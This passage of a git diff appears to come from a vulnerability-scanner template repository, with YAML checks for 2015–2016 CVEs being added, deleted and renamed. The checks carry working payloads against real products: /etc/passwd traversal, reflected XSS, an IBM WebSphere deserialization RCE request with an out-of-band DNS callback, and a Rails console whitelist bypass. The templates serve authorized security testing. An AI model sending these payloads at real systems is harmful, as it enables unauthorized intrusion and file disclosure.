"{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2015/CVE-2015-7450.yaml b/nuclei-templates/CVE-2015/CVE-2015-7450.yaml deleted file mode 100644 index feebde88db..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-7450.yaml +++ /dev/null @@ -1,61 +0,0 @@ -id: CVE-2015-7450 - -info: - name: IBM WebSphere Java Object Deserialization - Remote Code Execution - author: wdahlenb - severity: critical - description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). - reference: - - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2015-7450 - cwe-id: CWE-94 - metadata: - shodan-query: http.html:"IBM WebSphere Portal" - tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java,kev - -requests: - - raw: - - | - POST / HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml; charset=utf-8 - SOAPAction: "urn:AdminService" - - - - - - - - rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== - getUnsavedChanges - {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}} - rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= - - - - - matchers-condition: and - matchers: - - type: status - status: - - 500 - - - type: word - words: - - 'SOAP-ENV:Server' - - '' - condition: and - - - type: word - part: interactsh_protocol # Confirms the DNS Interaction - words: - - "dns" - -# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2015/CVE-2015-7823.yaml b/nuclei-templates/CVE-2015/CVE-2015-7823.yaml deleted file mode 100644 index dcfd90e56a..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-7823.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2015-7823 - -info: - name: Kentico CMS 8.2 - Open Redirect - author: 0x_Akoko - severity: low - description: Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. - reference: - - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 - - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html - classification: - cve-id: CVE-2015-7823 - tags: cve,cve2015,kentico,redirect,packetstorm - -requests: - - method: GET - path: - - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header - -# Enhanced by mp on 2022/09/30 diff --git a/nuclei-templates/CVE-2015/cve-2015-8349.yaml b/nuclei-templates/CVE-2015/CVE-2015-8349.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-8349.yaml rename to nuclei-templates/CVE-2015/CVE-2015-8349.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-8399.yaml b/nuclei-templates/CVE-2015/CVE-2015-8399.yaml deleted file mode 100644 index ff2bee94b7..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-8399.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2015-8399 - -info: - name: Atlassian Confluence <5.8.17 - Information Disclosure - author: princechaddha - severity: medium - description: Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. - reference: - - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro - - https://www.exploit-db.com/exploits/39170/ - - http://web.archive.org/web/20201209041130/https://www.securityfocus.com/archive/1/537232/100/0/threaded - - https://nvd.nist.gov/vuln/detail/CVE-2015-8399 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 - cve-id: CVE-2015-8399 - cwe-id: CWE-200 - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: edb,cve,cve2015,atlassian,confluence - -requests: - - method: GET - path: - - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "confluence-init.properties" - - "View Default Decorator" - condition: and - -# Enhanced by mp on 2022/09/30 diff --git a/nuclei-templates/CVE-2015/cve-2015-8813.yaml b/nuclei-templates/CVE-2015/CVE-2015-8813.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-8813.yaml rename to nuclei-templates/CVE-2015/CVE-2015-8813.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-9414.yaml b/nuclei-templates/CVE-2015/CVE-2015-9414.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-9414.yaml rename to nuclei-templates/CVE-2015/CVE-2015-9414.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-1000012.yaml b/nuclei-templates/CVE-2015/cve-2015-1000012.yaml new file mode 100644 index 0000000000..5b40f010c9 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-1000012.yaml @@ -0,0 +1,33 @@ +id: CVE-2015-1000012 + +info: + name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin + reference: + - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 + - http://www.vapidlabs.com/advisory.php?v=154 + - http://www.securityfocus.com/bid/94495 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2015-1000012 + cwe-id: CWE-200 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-2067.yaml b/nuclei-templates/CVE-2015/cve-2015-2067.yaml new file mode 100644 index 0000000000..be886e0f23 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-2067.yaml @@ -0,0 +1,30 @@ +id: CVE-2015-2067 + +info: + name: Magento Server Magmi Plugin - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. + reference: + - https://www.exploit-db.com/exploits/35996 + - https://nvd.nist.gov/vuln/detail/CVE-2015-2067 + - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html + classification: + cve-id: CVE-2015-2067 + tags: cve,cve2015,lfi,magento,magmi,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-3224.yaml b/nuclei-templates/CVE-2015/cve-2015-3224.yaml new file mode 100644 index 0000000000..34a797940a --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-3224.yaml @@ -0,0 +1,43 @@ +id: CVE-2015-3224 + +info: + name: Ruby on Rails Web Console - Remote Code Execution + author: pdteam + severity: critical + description: Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb. + reference: + - https://www.metahackers.pro/rails-web-console-v2-whitelist-bypass-code-exec/ + - https://www.jomar.fr/posts/2022/basic_recon_to_rce_ii/ + - https://hackerone.com/reports/44513 + - https://nvd.nist.gov/vuln/detail/CVE-2015-3224 + classification: + cve-id: CVE-2015-3224 + tags: ruby,hackerone,cve,cve2015,rce,rails + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + headers: + X-Forwarded-For: ::1 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Rails.root:" + - "Action Controller: Exception caught" + condition: and + + - type: word + part: response + words: + - "X-Web-Console-Session-Id" + - "data-remote-path=" + - "data-session-id=" + case-insensitive: true + condition: or + +# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2015/cve-2015-3337.yaml b/nuclei-templates/CVE-2015/cve-2015-3337.yaml new file mode 100644 index 0000000000..9f755b9cac --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-3337.yaml @@ -0,0 +1,31 @@ +id: CVE-2015-3337 + +info: + name: Elasticsearch Head plugin LFI + author: pdteam + severity: high + description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors. + reference: + - https://www.exploit-db.com/exploits/37054/ + - http://www.securityfocus.com/archive/1/535385 + - https://www.elastic.co/community/security + - http://www.debian.org/security/2015/dsa-3241 + classification: + cve-id: CVE-2015-3337 + tags: cve,cve2015,elastic,lfi,elasticsearch,plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-5471.yaml b/nuclei-templates/CVE-2015/cve-2015-5471.yaml new file mode 100644 index 0000000000..4b257f672c --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-5471.yaml @@ -0,0 +1,37 @@ +id: CVE-2015-5471 + +info: + name: Swim Team <= v1.44.10777 - Local File Inclusion + author: 0x_Akoko + severity: medium + description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system. + reference: + - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 + - http://www.vapid.dhs.org/advisory.php?v=134 + - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 + - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html + remediation: Upgrade to Swim Team version 1.45 or newer. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2015-5471 + cwe-id: CWE-22 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by cs on 2022/02/25 diff --git a/nuclei-templates/CVE-2015/cve-2015-6544.yaml b/nuclei-templates/CVE-2015/cve-2015-6544.yaml new file mode 100644 index 0000000000..b0c4f26019 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-6544.yaml @@ -0,0 +1,40 @@ +id: CVE-2015-6544 + +info: + name: iTop XSS + author: pikpikcu + severity: medium + description: | + Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-6544 + - https://www.htbridge.com/advisory/HTB23268 + - http://sourceforge.net/p/itop/tickets/1114/ + - http://sourceforge.net/p/itop/code/3662/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2015-6544 + cwe-id: CWE-79 + tags: cve,cve2015,xss,itop + +requests: + - method: GET + path: + - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '' + part: body + + - type: status + status: + - 200 + + - type: word + part: header + words: + - text/html diff --git a/nuclei-templates/CVE-2015/cve-2015-7377.yaml b/nuclei-templates/CVE-2015/cve-2015-7377.yaml new file mode 100644 index 0000000000..a5229480b0 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-7377.yaml @@ -0,0 +1,36 @@ +id: CVE-2015-7377 + +info: + name: Pie-Register <= 2.0.18 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in pie-register/pie-register.php in the Pie Register plugin before 2.0.19 for WordPress allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URI. + reference: + - https://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2015-7377 + - http://packetstormsecurity.com/files/133928/WordPress-Pie-Register-2.0.18-Cross-Site-Scripting.html + - https://github.com/GTSolutions/Pie-Register/blob/2.0.19/readme.txt + classification: + cve-id: CVE-2015-7377 + tags: cve,cve2015,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2015/cve-2015-7450.yaml b/nuclei-templates/CVE-2015/cve-2015-7450.yaml new file mode 100644 index 0000000000..4f0418f4b2 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-7450.yaml @@ -0,0 +1,59 @@ +id: CVE-2015-7450 + +info: + name: IBM WebSphere Java Object Deserialization - Remote Code Execution + author: wdahlenb + severity: critical + description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). + reference: + - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py + - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 + - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2015-7450 + cwe-id: CWE-94 + tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml; charset=utf-8 + SOAPAction: "urn:AdminService" + + + + + + + + rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA== + getUnsavedChanges + {{ generate_java_gadget("dns", "{{interactsh-url}}", "base64-raw")}} + rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24= + + + + + matchers-condition: and + matchers: + - type: status + status: + - 500 + + - type: word + words: + - 'SOAP-ENV:Server' + - '' + condition: and + + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + +# Enhanced by mp on 2022/05/10 diff --git a/nuclei-templates/CVE-2015/cve-2015-7823.yaml b/nuclei-templates/CVE-2015/cve-2015-7823.yaml new file mode 100644 index 0000000000..78174bdbb0 --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-7823.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-7823 + +info: + name: Kentico CMS 8.2 Open Redirection + author: 0x_Akoko + severity: low + description: The GetDocLink.ashx with link variable is vulnerable to open redirect vulnerability + reference: + - https://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html + - https://nvd.nist.gov/vuln/detail/CVE-2015-7823 + - http://packetstormsecurity.com/files/133981/Kentico-CMS-8.2-Cross-Site-Scripting-Open-Redirect.html + classification: + cve-id: CVE-2015-7823 + tags: cve,cve2015,kentico,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/nuclei-templates/CVE-2015/cve-2015-8399.yaml b/nuclei-templates/CVE-2015/cve-2015-8399.yaml new file mode 100644 index 0000000000..907864b58b --- /dev/null +++ b/nuclei-templates/CVE-2015/cve-2015-8399.yaml @@ -0,0 +1,37 @@ +id: CVE-2015-8399 + +info: + name: Atlassian Confluence configuration files read + author: princechaddha + severity: medium + description: Atlassian Confluence before 5.8.17 allows remote authenticated users to read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action. + reference: + - https://jira.atlassian.com/browse/CONFSERVER-39704?src=confmacro + - https://www.exploit-db.com/exploits/39170/ + - http://www.securityfocus.com/archive/1/537232/100/0/threaded + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2015-8399 + cwe-id: CWE-200 + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: cve,cve2015,atlassian,confluence + +requests: + - method: GET + path: + - "{{BaseURL}}/spaces/viewdefaultdecorator.action?decoratorName" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "confluence-init.properties" + - "View Default Decorator" + condition: and diff --git a/nuclei-templates/CVE-2015/CVE-2015-9480.yaml b/nuclei-templates/CVE-2015/cve-2015-9480.yaml similarity index 100% rename from nuclei-templates/CVE-2015/CVE-2015-9480.yaml rename to nuclei-templates/CVE-2015/cve-2015-9480.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-0957.yaml b/nuclei-templates/CVE-2016/CVE-2016-0957.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-0957.yaml rename to nuclei-templates/CVE-2016/CVE-2016-0957.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000128.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000128.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000128.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000128.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml deleted file mode 100644 index be2081c1a5..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000131.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-1000131 - -info: - name: e-search <= 1.0 - Reflected Cross-Site Scripting (XSS) via title_az.php - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin e-search v1.0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000131 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=393 - - https://wordpress.org/plugins/e-search - - http://web.archive.org/web/20210123183536/https://www.securityfocus.com/bid/93867/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000131 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml deleted file mode 100644 index 455133a336..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000133.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-1000133 - -info: - name: forget-about-shortcode-buttons 1.1.1 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin forget-about-shortcode-buttons v1.1.1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000133 - - https://wordpress.org/plugins/forget-about-shortcode-buttons - - http://www.vapidlabs.com/wp/wp_advisory.php?v=602 - - http://web.archive.org/web/20210123183542/https://www.securityfocus.com/bid/93869/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000133 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/forget-about-shortcode-buttons/assets/js/fasc-buttons/popup.php?source=1&ver=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/cve-2016-1000138.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000138.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000138.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000138.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000139.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000139.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000139.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000139.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000140.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000140.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000140.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000140.yaml diff --git a/nuclei-templates/CVE-2016/cve-2016-1000142.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000142.yaml similarity index 100% rename from nuclei-templates/CVE-2016/cve-2016-1000142.yaml rename to nuclei-templates/CVE-2016/CVE-2016-1000142.yaml diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000143.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000143.yaml deleted file mode 100644 index 65b05e634d..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000143.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2016-1000143 - -info: - name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin photoxhibit v2.1.8 - reference: - - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 - tags: cve,cve2016,wordpress,wp-plugin,xss - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2016-1000143 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/photoxhibit/common/inc/pages/build.php?gid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml deleted file mode 100644 index 4b4633af3b..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000149.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-1000149 - -info: - name: Simpel Reserveren 3 <= 3.5.2 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin simpel-reserveren v3.5.2 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000149 - - https://wordpress.org/plugins/simpel-reserveren - - http://www.vapidlabs.com/wp/wp_advisory.php?v=474 - - http://web.archive.org/web/20210125181834/https://www.securityfocus.com/bid/93582/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000149 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000152.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000152.yaml deleted file mode 100644 index 0f64d98a09..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000152.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-1000152 - -info: - name: Tidio-form <= 1.0 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin tidio-form v1.0 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000152 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=799 - - https://wordpress.org/plugins/tidio-form - - http://web.archive.org/web/20210125181732/https://www.securityfocus.com/bid/93579/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000152 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/tidio-form/popup-insert-help.php?formId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-1000154.yaml b/nuclei-templates/CVE-2016/CVE-2016-1000154.yaml deleted file mode 100644 index 1dab289247..0000000000 --- a/nuclei-templates/CVE-2016/CVE-2016-1000154.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2016-1000154 - -info: - name: WHIZZ <= 1.0.7 - Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - description: Reflected XSS in wordpress plugin whizz v1.0. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000154 - - http://www.vapidlabs.com/wp/wp_advisory.php?v=112 - - https://wordpress.org/plugins/whizz - - http://web.archive.org/web/20210123180140/https://www.securityfocus.com/bid/93538/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2016-1000154 - cwe-id: CWE-79 - tags: cve,cve2016,wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2016/CVE-2016-10033.yaml 